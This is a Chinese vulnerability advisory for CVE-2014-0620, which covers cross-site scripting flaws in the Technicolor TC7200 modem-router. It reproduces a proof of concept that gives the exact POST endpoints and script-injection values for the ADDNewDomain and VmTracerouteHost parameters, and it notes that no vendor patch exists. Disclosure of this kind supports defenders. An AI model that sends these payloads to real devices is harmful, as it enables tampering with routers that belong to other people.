发布日期:2014-01-07
更新日期:2014-01-09
受影响系统:
technicolor TC7200 STD6.01.12
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-0620
Technicolor TC7200是调制解调器和路由器产品。
Technicolor TC7200 STD6.01.12在实现上存在多个跨站请求伪造漏洞,远程攻击者通过parental/website-filters.asp的ADDNewDomain参数,或者goform/status/diagnostics-route的VmTracerouteHost参数,利用此漏洞可注入任意Web脚本或HTML。
<*来源:Jeroen - IT Nerdbox
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0620
#
# Proof of Concept:
#
#
## Persistent Cross Site Scripting:
#
# POST : <ip>/parental/website-filters.asp
# Parameters:
#
# WebFilteringTable 0
# WebFilteringChangePolicies 0
# WebFiltersADDKeywords
# WebFilteringdomainMode 0
# ADDNewDomain <script>alert('IT Nerdbox');</script>
# WebFiltersKeywordButton 0
# WebFiltersDomainButton 1
# WebPolicyName
# WebFiltersRemove 0
# WebFiltersADD 0
# WebFiltersReset 0
#
#
## Reflected Cross Site Scripting
#
# POST : <ip>//goform/status/diagnostics-route
# Parameters:
#
# VmTracerouteHost "><script>alert('IT Nerdbox');</script>
# VmMaxTTL 30
# VmTrIsInProgress 0
# VmTrUtilityCommand 1
#
# Check out the video at:
建议:
--------------------------------------------------------------------------------
厂商补丁:
technicolor
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: